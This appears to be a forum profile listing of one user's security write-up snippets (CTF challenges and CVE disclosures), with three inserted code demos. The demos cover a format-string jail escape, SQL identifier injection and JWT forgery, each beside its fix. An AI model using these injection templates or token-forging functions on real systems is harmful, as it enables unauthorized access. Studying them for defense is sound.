Recent content by 0x90

  1. 0x90

    [CVE-2026-40172] Authentik Privilege Escalation via User PATCH

    Privilege Escalation via User PATCH: Superuser Group Assignment Bypasses enable_group_superuser. Summary: PATCH /api/v3/core/users/{pk}/ allows a caller with change_user on a target user to assign arbitrary groups through UserSerializer, including groups with is_superuser=True, without requiring...
  2. 0x90

    [PlfanzenCTF] [MISC] pdfjail

    The escape was short because Python helpfully attached the dangerous object to the exception. The jail read one ASCII line under 120 bytes and executed it with ReportLab's rl_safe_exec. The useful primitive was str.format. Format strings can walk attributes in ways that bypass ReportLab's...
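The attribute-walking primitive mentioned above, as an added illustration that is not the challenge's code and does not model ReportLab's rl_safe_exec: a renderer that hands an object to a user-controlled `str.format` template lets the template walk from that object to its class, its MRO and the function globals, while a `string.Formatter` subclass that only resolves allow-listed bare field names blocks the traversal. The `Greeting` class, the module-level `SECRET`, `SafeFormatter` and the two attacker templates are constructed for this example.

```python
import string

SECRET = "constructed-secret"  # module-level value a template must never be able to read


class Greeting:
    """Constructed stand-in for the object a sandbox hands to a user-controlled template."""

    def __init__(self, name: str):
        self.name = name


def render_unsafe(template: str, obj) -> str:
    # str.format resolves dotted attributes and [...] indexes itself, so anything
    # reachable from obj by attribute walking is reachable from the template text.
    return template.format(obj)


class SafeFormatter(string.Formatter):
    """Resolves only bare, allow-listed field names; no attribute or index traversal."""

    def __init__(self, allowed: dict):
        super().__init__()
        self.allowed = allowed

    def get_field(self, field_name, args, kwargs):
        # field_name is the raw text between "{" and "}" (before "!" or ":"), e.g.
        # "0.__class__.__mro__", so an exact allow-list match rejects every walk.
        if field_name not in self.allowed:
            raise ValueError(f"disallowed template field: {field_name!r}")
        return self.allowed[field_name], field_name


def render_safe(template: str, obj) -> str:
    return SafeFormatter({"name": obj.name}).format(template)


# Constructed attacker templates, each a single short ASCII line as a size-limited jail allows.
WALK_TO_OBJECT = "{0.__class__.__mro__[1].__name__}"   # class -> MRO -> object
WALK_TO_GLOBALS = "{0.__init__.__globals__[SECRET]}"    # bound method -> function globals


def safe_rejects(template: str, obj) -> bool:
    """True if the allow-listing renderer refuses the template."""
    try:
        render_safe(template, obj)
    except ValueError:
        return True
    return False
```

Note that `__init__.__globals__` is the module namespace of wherever the class was defined, which is why a "harmless" object is enough to reach module-level names; the fix is not to filter dunder substrings but to stop `str.format` from resolving fields at all.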
  3. 0x90

    [PlfanzenCTF] [WEB] Gartenverein Tackenberg

    Varnish, please tell us the flag! The profile description was rendered as Markdown and then marked safe. That meant I could put raw HTML/CSS into my profile, including a <style> block. The admin bot was the interesting part. When I reported my profile, the bot logged in as its own user and...
  4. 0x90

    [PlfanzenCTF] [WEB] Unauthentische Rache

    This was three HTTP calls because the consent step was missing twice. The exploit looked almost too small at the end, but the interesting part was figuring out why it was allowed at all. The challenge had three moving pieces. Authentik was the identity provider. The flag dispenser owned the...
  5. 0x90

    [CVE-2026-39999] Apache APISIX jwt-auth: Turning a Public Key into an Auth Bypass

    TL;DR I found a JWT algorithm confusion bug in Apache APISIX that let me bypass authentication without credentials. The trick was simple, ugly, and very real: APISIX trusted the server-side key selection, but trusted the attacker-controlled JWT header for the verification algorithm. I found a...
  6. 0x90

    The $5,000 Hytale Bounty

    TL;DR: I reported this Hytale server bug less than a week after launch, then waited about a month for a response while their team got buried in incoming reports. The bug itself was a clean path traversal in the server file browser, and it ended with a $5,000 payout plus an invite to a private...
  7. 0x90

    [KalmarCTF] [REV] Oracle

    TL;DR Oracle turned out to be a nice little reversing chain with just enough nonsense to stay fun. The core idea was simple once I found the real entrypoint: the binary decrypts a blob with the first 7 input bytes, jumps through a Heaven’s Gate transition into 64 bit code, then uses a polynomial...
  8. 0x90

    [CVE-2026-33881] Windmill NativeTS Code Injection via Workspace Env Vars

    TL;DR: This one was almost offensively simple. Windmill’s NativeTS executor dropped workspace environment variable values into single-quoted JavaScript without escaping a single quote, which meant a workspace admin could inject code into every NativeTS run in that workspace. The public advisory...
  9. 0x90

    Apache Airflow, SSTI, and the Annoying Question of What Counts as a Vulnerability

    TL;DR: I reported what started as a pretty clean Jinja2 SSTI in Airflow, and it turned into a much more interesting argument about trust boundaries, product intent, and what a security model is actually supposed to mean. The exploit chain was real. The disagreement was about whether that chain...
  10. 0x90

    [CVE-2026-39356] Drizzle ORM Had a Real SQL Injection, and the Fix Was Refreshingly Boring

    TL;DR: I found a SQL injection in Drizzle ORM that sat in the identifier escaping path, which is exactly where a lot of people would assume things are safe. The bug was simple, the impact was not, and the disclosure process was one of the smoother ones I have dealt with. Drizzle had a real SQL...
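The identifier-escaping bug class described above, as an added example that is not Drizzle's code: a naive identifier quoter beside a correct one, run against an in-memory SQLite database so the effect of an injected column name is visible rather than asserted. The tables, rows, `SECRET_TOKEN` and `INJECTED_COLUMN` are constructed for this example, and the function names are this example's own.

```python
import re
import sqlite3

SECRET_TOKEN = "tok-constructed-0001"  # constructed row the query must not be able to reach


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE users(id INTEGER, name TEXT);"
        "CREATE TABLE secrets(token TEXT);"
        "INSERT INTO users VALUES (1, 'alice'), (2, 'bob');"
    )
    conn.execute("INSERT INTO secrets VALUES (?)", (SECRET_TOKEN,))
    return conn


def quote_ident_naive(name: str) -> str:
    # Wraps the name in double quotes but leaves embedded quotes alone: a quote inside
    # the name terminates the identifier early and everything after it is live SQL.
    return f'"{name}"'


def quote_ident(name: str) -> str:
    # SQL-standard identifier quoting: an embedded double quote is written as two.
    if "\x00" in name:
        raise ValueError("NUL byte in identifier")
    return '"' + name.replace('"', '""') + '"'


_IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")


def quote_ident_strict(name: str) -> str:
    # Allow-listing is the stronger option when identifiers come from untrusted input.
    if not _IDENT.fullmatch(name):
        raise ValueError(f"identifier rejected: {name!r}")
    return quote_ident(name)


def select_column(conn: sqlite3.Connection, column: str, quote) -> list:
    # Bind parameters can carry values but never a column name, which is exactly why
    # identifier escaping exists and why a bug in it is a real injection.
    return [row[0] for row in conn.execute(f"SELECT {quote(column)} FROM users")]


# Constructed attacker-controlled "column name".
INJECTED_COLUMN = 'name" FROM users UNION SELECT token FROM secrets --'


def leaks_secret(quote) -> bool:
    """True if selecting INJECTED_COLUMN through `quote` returns a row from the secrets table."""
    try:
        rows = select_column(make_db(), INJECTED_COLUMN, quote)
    except (sqlite3.OperationalError, ValueError):
        # Correct quoting yields an unknown column (or, on SQLite builds with the
        # double-quoted-string quirk, a harmless string literal); strict quoting rejects it.
        return False
    return SECRET_TOKEN in rows
```

With the naive quoter the statement becomes `SELECT "name" FROM users UNION SELECT token FROM secrets --" FROM users`, and the trailing `--` swallows the original tail; with the correct quoter the whole injected text stays one (non-existent) identifier.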
  11. 0x90

    [/MNT/AIN LIB] [WEB] agebarrier

    This challenge isn't supposed to be easy LOL. The amount of time I invested into figuring this out is disgusting... So basically there is a JWT age check... you can generate tokens with an endpoint. If your token is 18+ years old you can access the flag... The whole trick was to set different...
  12. 0x90

    [/MNT/AIN LIB] [WEB] rtfm

    Yeah, this one was a lil harder, cba to read documentation... const u = await prisma.user.findUnique({ where: { username: c.username, password: c.password, }, }); if (!u) { return new Response('UNAUTHORIZED', { status: 401 }); }...
  13. 0x90

    [/MNT/AIN LIB] [WEB] x-is-for-execution

    Beginner-friendly command injection. The only safeguard is a client-side HTML pattern, which prevents you from properly escaping the command literals. So we can just delete the pattern attribute (or send a request manually), escape the shown base command and print out the flag in...
  14. 0x90

    [/MNT/AIN LIB] [WEB] critical-integrity

    Owww myy gaawwd, JWT trickery! The challenge is to not log in as guest, but log in as admin and visit /admin. There is a cookie set, which is a JWT. We can basically just change the user to admin and encode it again...
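Two of the JWT failure modes on this page, the algorithm confusion from the Apache APISIX jwt-auth entry (item 5) and the unverified "change the user and re-encode it" token from critical-integrity (item 14), as one added example that is neither APISIX's nor the CTF's code. It builds JWTs with the standard library only, so it carries a small textbook RSA implementation purely to make the RS256 side real offline; the consumer store, the key pair, the token claims and all function names (`verify_trusting_header`, `verify_pinned`, `decode_without_verifying`, `forge_with_public_key`, `tamper_payload`) are this example's own assumptions.

```python
import base64, hashlib, hmac, json, secrets


def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64u_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


# Textbook RSA (PKCS#1 v1.5 with SHA-256) so the demo runs with the standard library only.
# Assumption: a real deployment verifies with a vetted crypto library, never with this.
def _is_probable_prime(n: int, rounds: int = 16) -> bool:
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):  # Miller-Rabin with random witnesses
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits: int) -> int:
    while True:
        cand = secrets.randbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def gen_rsa_keypair(bits: int = 1024):
    e = 65537
    while True:
        p, q = _gen_prime(bits // 2), _gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:
            return {"n": p * q, "e": e}, {"n": p * q, "d": pow(e, -1, phi)}


_SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def _emsa_pkcs1_v15(msg: bytes, k: int) -> int:
    t = _SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return int.from_bytes(b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t, "big")


def rs256_sign(msg: bytes, priv: dict) -> bytes:
    k = (priv["n"].bit_length() + 7) // 8
    return pow(_emsa_pkcs1_v15(msg, k), priv["d"], priv["n"]).to_bytes(k, "big")


def rs256_verify(msg: bytes, sig: bytes, pub: dict) -> bool:
    k = (pub["n"].bit_length() + 7) // 8
    return len(sig) == k and pow(int.from_bytes(sig, "big"), pub["e"], pub["n"]) == _emsa_pkcs1_v15(msg, k)


def hs256_sign(msg: bytes, key: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.sha256).digest()


def make_token(header: dict, payload: dict, sign) -> str:
    signing_input = b64u(json.dumps(header).encode()) + "." + b64u(json.dumps(payload).encode())
    return signing_input + "." + b64u(sign(signing_input.encode()))


def split_token(token: str):
    h, p, s = token.split(".")
    return json.loads(b64u_decode(h)), json.loads(b64u_decode(p)), b64u_decode(s), (h + "." + p).encode()


# Constructed consumer store: one consumer, one RSA public key. The serialization is a
# stand-in for PEM; what matters is that these bytes are public and therefore attacker-known.
PUB, PRIV = gen_rsa_keypair()
CONSUMERS = {"alice": {"alg": "RS256", "key": json.dumps(PUB).encode()}}


def verify_trusting_header(token: str):
    """Vulnerable shape: key chosen server-side, algorithm read from the attacker-controlled header."""
    header, payload, sig, signing_input = split_token(token)
    consumer = CONSUMERS[payload["sub"]]
    if header.get("alg") == "RS256":
        ok = rs256_verify(signing_input, sig, json.loads(consumer["key"]))
    elif header.get("alg") == "HS256":  # the public key bytes silently become the HMAC secret
        ok = hmac.compare_digest(hs256_sign(signing_input, consumer["key"]), sig)
    else:
        ok = False
    return payload if ok else None


def verify_pinned(token: str):
    """Fixed shape: the algorithm is a property of the configured key, never of the token."""
    header, payload, sig, signing_input = split_token(token)
    consumer = CONSUMERS[payload["sub"]]
    if header.get("alg") != consumer["alg"]:
        return None
    return payload if rs256_verify(signing_input, sig, json.loads(consumer["key"])) else None


def decode_without_verifying(token: str) -> dict:
    """The 'change the user and re-encode it' case: the signature is never checked at all."""
    return split_token(token)[1]


def legit_token(sub: str, **claims) -> str:
    return make_token({"alg": "RS256", "typ": "JWT"}, {"sub": sub, **claims}, lambda m: rs256_sign(m, PRIV))


def forge_with_public_key(sub: str, **claims) -> str:
    """Attacker holding only the public key signs HS256 with its bytes as the secret."""
    key = CONSUMERS[sub]["key"]
    return make_token({"alg": "HS256", "typ": "JWT"}, {"sub": sub, **claims}, lambda m: hs256_sign(m, key))


def tamper_payload(token: str, **changes) -> str:
    """Attacker re-encodes the payload and keeps the original signature."""
    h, p, s = token.split(".")
    payload = {**json.loads(b64u_decode(p)), **changes}
    return h + "." + b64u(json.dumps(payload).encode()) + "." + s
```

The check that matters in a real verifier is the one in `verify_pinned`: the expected algorithm is looked up alongside the key, and any token whose header disagrees is rejected before a single byte of signature is examined.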
  15. 0x90

    [/MNT/AIN LIB] [CRYPTO] confident-hashes

    confident-hashes SRC: https://library.m0unt41n.ch/challenges/confident-hashes This challenge allows the "breaching" of the admin hash, and the goal is to reverse the hash function to obtain the password. Under the hood, this custom hash operates on 32 nibbles (4-bit words), repeatedly XOR'ing...